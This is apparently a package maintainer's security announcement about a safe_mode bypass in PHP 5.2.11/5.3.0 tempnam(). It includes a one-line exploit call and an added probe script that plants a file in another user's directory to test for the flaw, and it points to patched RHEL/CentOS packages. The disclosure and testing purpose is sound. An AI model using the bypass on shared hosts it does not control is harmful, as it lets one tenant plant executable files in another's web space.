PHP 5.2.11 and PHP 5.3.0 tempnam() safe_mode vulnerability – Patched For RHEL/CentOS

A vulnerability in both PHP 5.2.11 and 5.3.0 was announced on September 30, 2009 via Security Reason.  Grzegorz Stachowiak discovered a safe_mode bypass in the tempnam() function that lets any local user, or any script executed by the Apache user, create files in another user's directory (provided that directory is writable by the Apache user) without being subject to safe_mode's ownership restrictions.

The Vulnerability

The vulnerability exists because tempnam() in ext/standard/file.c only enforces open_basedir restrictions and skips the standard safe_mode UID/GID ownership check that PHP's other filesystem functions perform before touching a path.  Take the following example:

UserX and UserY both have virtual hosts on a shared server with safe_mode enabled.  Safe mode dictates that scripts owned by UserX cannot access UserY's directories/files, even though the Apache user is the one executing the scripts and has system-level permissions to access both.

With the vulnerability in tempnam(), UserX can craft a script that creates a temp file in UserY's directory (if that directory is writable by the user the script executes as, normally Apache) with a call such as:

$path = tempnam('/home/UserY/www', 'user_x_file.php');

This successfully creates a file in '/home/UserY/www' and returns its path, which UserX can then write to and execute.  Note that tempnam() appends random characters to the prefix, so the file is named user_x_file.phpXXXXXX rather than user_x_file.php; the returned path tells the caller the actual name.
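As an added check (example code, not part of the IUS announcement or of PHP itself), the following script probes whether a safe_mode host is still exposed. It assumes it is run as a script owned by UserX and that /home/UserY/www is owned by UserY and writable by the Apache user; both the path and the user names are assumptions carried over from the scenario above. A direct fopen() is shown next to the tempnam() call so the difference in safe_mode enforcement is visible.

```php
<?php
// Added example, not from the original announcement. Probe a safe_mode host
// for the tempnam() ownership-check bypass. Run it as a script owned by UserX.
// Assumption: $victim_dir is owned by UserY and writable by the Apache user.
$victim_dir = '/home/UserY/www';

if (!ini_get('safe_mode')) {
    echo "safe_mode is Off; this probe is only meaningful with safe_mode=On\n";
    exit(1);
}

// Reference point: a direct write goes through safe_mode's UID/GID check,
// so from a UserX-owned script it is refused on a UserY-owned directory.
$probe = $victim_dir . '/safe_mode_probe.txt';
$fh = @fopen($probe, 'w');
if ($fh === false) {
    echo "fopen(): refused by safe_mode (expected)\n";
} else {
    fclose($fh);
    @unlink($probe);
    echo "fopen(): succeeded, safe_mode is not restricting this directory\n";
}

// The call from the advisory. tempnam() appends random characters to the
// prefix, so the created name is user_x_file.phpXXXXXX, not user_x_file.php.
$tmp = @tempnam($victim_dir, 'user_x_file.php');
if ($tmp === false) {
    echo "tempnam(): refused, this build applies the safe_mode check (patched)\n";
} elseif (realpath(dirname($tmp)) === realpath($victim_dir)) {
    echo "tempnam(): created $tmp in another user's directory, build is VULNERABLE\n";
    @unlink($tmp);
} else {
    // tempnam() silently falls back to the system temp directory when $dir is
    // not usable, so a non-false return alone does not prove the bypass.
    echo "tempnam(): fell back to $tmp, directory not writable by this process?\n";
    @unlink($tmp);
}
```

Run it from UserX's virtual host (or from the CLI with the same php.ini). On an unpatched 5.2.11/5.3.0 build the output reports fopen() refused and tempnam() VULNERABLE; on the patched packages both calls are refused. The @unlink cleanup may itself be blocked by safe_mode, because the created file is owned by the web-server user rather than by UserX; remove the file by hand in that case.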

The Fix

The PHP developers have patched this bug in upstream CVS; the IUS CoreDev team has backported the fix and applied it to our php52 and php53 packages.  The diffs are available here:

Installing IUS Patched RPMs for RHEL/CentOS

Packages are available for RHEL/CentOS 4 (php52) and RHEL/CentOS 5 (php52 and php53).  For installation/upgrade instructions see the Getting Started page and/or the Wiki.

Other IUS Package Updates

In addition to these package updates we have also released a number of other updates to IUS Stable.  Please see our other announcements:

Thanks!


BJ Dierkes
Linux Systems Engineer IV / [RH]acker
Infrastructure Services [OS & Applications]
Rackspace Hosting
